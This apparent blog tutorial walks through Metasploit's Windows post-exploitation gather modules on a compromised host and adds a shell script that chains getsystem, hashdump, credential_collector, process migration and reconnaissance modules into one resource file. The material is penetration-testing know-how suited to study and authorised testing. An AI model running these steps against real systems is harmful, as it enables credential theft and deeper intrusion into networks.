Sunday, May 11, 2014

Metasploit Modules Post Windows Gather {Computer Forensics Tutorial}




Open a terminal in Kali Linux and start the framework console with msfconsole.

Once you have a Meterpreter session on the target (list sessions with sessions -l), each post module below can be run in one of two ways: from inside the Meterpreter shell with run post/windows/gather/<module>, or from the msfconsole prompt with use post/windows/gather/<module>, set SESSION <id>, run. The second form lets you set module options (such as RHOSTS) before running.

1)      arp_scanner
The "arp_scanner" post module (post/windows/gather/arp_scanner) performs an ARP sweep of a given range (the RHOSTS option) from the compromised host. Because the requests are sent from the victim's own network interface, it discovers hosts on the internal subnet that are not directly reachable from the attacking machine, which is the starting point for pivoting.




2)      checkvm
The "checkvm" post module, simply enough, checks whether the compromised host is a virtual machine by looking for hypervisor artefacts such as vendor-specific registry keys, drivers and services. This module supports Hyper-V, VMware, VirtualBox, Xen and QEMU virtual machines. Running it early tells you whether you may be inside a sandbox, honeypot or lab image rather than a production host.


3)      credential_collector
The "credential_collector" module (post/windows/gather/credentials/credential_collector) harvests password hashes and access tokens on the compromised host and stores them in the Metasploit database, where they can be listed with the creds command. Dumping the hashes requires SYSTEM privileges, so run getsystem first if the session is not already SYSTEM.


4)      dumplinks
The "dumplinks" module parses the .lnk shortcut files in a user's Recent Documents folder, revealing the names and paths of files the user opened, which can be useful for further information gathering. Note that the module reads the profile of the user the Meterpreter process is running as: a SYSTEM session sees only the SYSTEM profile, so first migrate into a process owned by the logged-on user (for example explorer.exe) and then run the module.


5)      enum_applications
The "enum_applications" module enumerates the applications that are installed on the compromised host. 

6)      enum_logged_on_users
The "enum_logged_on_users" post module returns a listing of currently and recently logged-on users along with their SIDs.


7)      enum_shares
The "enum_shares" post module returns a listing of both configured and recently used shares on the compromised system. 


8)      enum_snmp
The "enum_snmp" module enumerates the SNMP service configuration on the target, if the service is present, including the community strings and their access rights. Community strings are frequently reused across devices, so they are worth trying against other hosts on the internal network.



9)      hashdump
The "hashdump" post module dumps the password hashes of the local user accounts on the compromised host by reading the SAM through the registry. It requires SYSTEM privileges (run getsystem first); for a session that is not SYSTEM, the credential_collector module or the smart_hashdump module are the usual alternatives.

10)  usb_history
The "usb_history" module enumerates the USB storage devices that have been connected to the compromised system, using the USBSTOR and mounted-device registry artefacts, and is a quick way to spot removable media that may have been used for data transfer.

11)  delete_user
The "delete_user" post module deletes a specified user account from the compromised system. Unlike the modules above it lives under post/windows/manage rather than post/windows/gather, and it modifies the target, so it has no place in a forensic workflow and should only be used where the engagement explicitly allows changes to the host.
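As an added example (not code from the original post or from Metasploit itself), the POSIX shell script below generates a msfconsole resource file that runs the gather modules covered above in a sensible order against one Meterpreter session and spools the output to a log file for the report. The session ID, the ARP range and the log path are assumed to be supplied by the operator, and the module paths and the migrate module's NAME option are assumed to match a current Metasploit Framework install; delete_user is deliberately left out because it changes the target.

```shell
#!/bin/sh
# Added example, not code from the original post or from Metasploit:
# generate a msfconsole resource script that runs the gather modules
# covered above against one Meterpreter session, then hand it to
# msfconsole -r.
# Assumptions (not stated on the page): session ID, ARP range and log path
# come from the caller; module paths and the migrate module's NAME option
# match a current Metasploit Framework install.

# build_gather_rc SESSION RHOSTS LOGFILE  -> prints the resource script
build_gather_rc() {
    session="$1"   # Meterpreter session ID, as listed by `sessions -l`
    rhosts="$2"    # range for arp_scanner, e.g. 192.168.1.0/24
    logfile="$3"   # msfconsole `spool` target; keeps a record for the report

    printf 'spool %s\n' "$logfile"

    # Modules that work at any privilege level: plain use / set SESSION / run.
    for mod in checkvm enum_applications enum_logged_on_users \
               enum_shares enum_snmp usb_history; do
        printf 'use post/windows/gather/%s\nset SESSION %s\nrun\n' "$mod" "$session"
    done

    # arp_scanner needs the range to sweep from the victim's side.
    printf 'use post/windows/gather/arp_scanner\nset SESSION %s\nset RHOSTS %s\nrun\n' \
        "$session" "$rhosts"

    # hashdump and credential_collector read the SAM, so escalate first.
    printf 'use post/windows/escalate/getsystem\nset SESSION %s\nrun\n' "$session"
    printf 'use post/windows/gather/hashdump\nset SESSION %s\nrun\n' "$session"
    printf 'use post/windows/gather/credentials/credential_collector\nset SESSION %s\nrun\n' \
        "$session"

    # dumplinks reads the profile of the user the Meterpreter process runs as,
    # so migrate into the logged-on user's explorer.exe before running it.
    printf 'use post/windows/manage/migrate\nset SESSION %s\nset NAME explorer.exe\nrun\n' \
        "$session"
    printf 'use post/windows/gather/dumplinks\nset SESSION %s\nrun\n' "$session"

    printf 'spool off\n'
}

# Usage: ./gather.sh <session-id> <arp-range> [logfile]
# e.g.   ./gather.sh 1 192.168.1.0/24 /tmp/gather-1.log
if [ "$#" -ge 2 ]; then
    rc="gather-$1.rc"
    build_gather_rc "$1" "$2" "${3:-/tmp/gather-$1.log}" > "$rc"
    msfconsole -q -r "$rc"
fi
```

The ordering matters: the SAM-reading modules come after getsystem, and dumplinks comes last, after the migration into the user's process, because once the session has moved into explorer.exe it no longer runs as SYSTEM. Review the generated .rc file before running it so that the module list matches what the engagement permits.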

